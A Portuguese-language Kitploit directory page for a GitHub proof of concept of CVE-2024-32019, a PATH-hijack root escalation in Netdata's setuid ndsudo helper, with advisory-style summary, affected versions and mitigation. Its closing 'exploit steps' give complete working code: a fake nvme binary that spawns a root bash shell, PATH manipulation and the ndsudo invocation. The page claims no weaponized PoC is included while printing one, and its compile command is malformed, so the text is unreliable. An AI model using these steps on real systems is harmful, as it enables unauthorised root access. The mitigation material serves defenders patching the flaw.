Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-32019-PoC | Kitploit
Ferramentas/GitHubGitHub/sphyos/cve-2024-32019-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubsphyos/cve-2024-32019-poc

cve-2024-32019-PoC

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-32019 — Escalação de Privilégio Local do Netdata ndsudo

Resumo

O auxiliar ndsudo do Netdata (instalado como setuid root) restringe quais comandos ele executará, mas resolve esses comandos usando o PATH do chamador. Em versões afetadas, um usuário local pode colocar um binário malicioso em uma posição anterior no PATH e fazer com que o ndsudo o execute com privilégios de root. Corrigido no Netdata 1.45.3 e 1.45.0-169.

Afetadas / Corrigidas

  • Afetadas: >= 1.44.0-60, < 1.45.0-169 e >= 1.45.0, < 1.45.3 (de acordo com o aviso upstream).

  • Corrigidas: 1.45.3 (estável), 1.45.0-169 (nightly). GitHub

Impacto

Escalação de privilégio local para root em sistemas onde o ndsudo está instalado como SUID e o usuário pode invocá-lo (comumente membros do grupo netdata). NVDGitHub

Causa Raiz (visão geral)

  • O ndsudo é SUID-root e tem uma lista de permissões de subcomandos como nvme-list, nvme-smart-log, etc.

  • Ele chama executáveis externos pelo nome (ex.: nvme), que são resolvidos via PATH em vez de usar caminhos absolutos ou uma busca segura e fixa.

  • Se um diretório gravável aparecer antes dos caminhos do sistema, um atacante pode introduzir um binário falso que será executado como root. GitHub

Reprodução / Verificação Segura

Este repositório inclui verificadores não exploit que:

  • Inspecionam /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (ou onde estiver instalado) quanto a SUID/propriedade.

  • Verificam o PATH em busca de diretórios graváveis anteriores aos caminhos comuns do sistema.

  • Confirmam a presença de nomes de subcomandos permitidos que o ndsudo possa tentar executar.

  • Opcionalmente executam ndsudo --test <subcommand> para imprimir o comando resolvido sem executá-lo (use com cuidado, leia o código antes). GitHub

⚠️ Nenhum PoC armamentizado está incluído. Este projeto destina-se a defensores e pesquisadores para avaliar a exposição e validar correções de forma responsável.

Mitigação

  • Atualize o Netdata para 1.45.3 (estável) ou 1.45.0-169 (nightly).

  • Como medida de defesa em profundidade, prefira caminhos absolutos ou um PATH mínimo saneado em auxiliares SUID; evite conceder acesso desnecessário ao ndsudo. GitHubwiz.io

Passos do Exploit

1. Salve o seguinte código C como nvme.c:
root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. Compile o Exploit
root@kitploit:~
gcc nvme.c - nvme
3. Configuração do Ambiente
root@kitploit:~
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Modifique o PATH
root@kitploit:~
export PATH=/tmp/fakebin:$PATH
5. Comando do Exploit
root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Referências

  • NVD: CVE-2024-32019. NVD

  • Aviso do Netdata (GHSA-pmhq-4cxq-wj93). GitHub

  • Resumo da Wiz. wiz.io

  • Artigo da Snyk. Guia de Vulnerabilidade

  • Listagem MITRE/CVE. CVE

Baixar ferramenta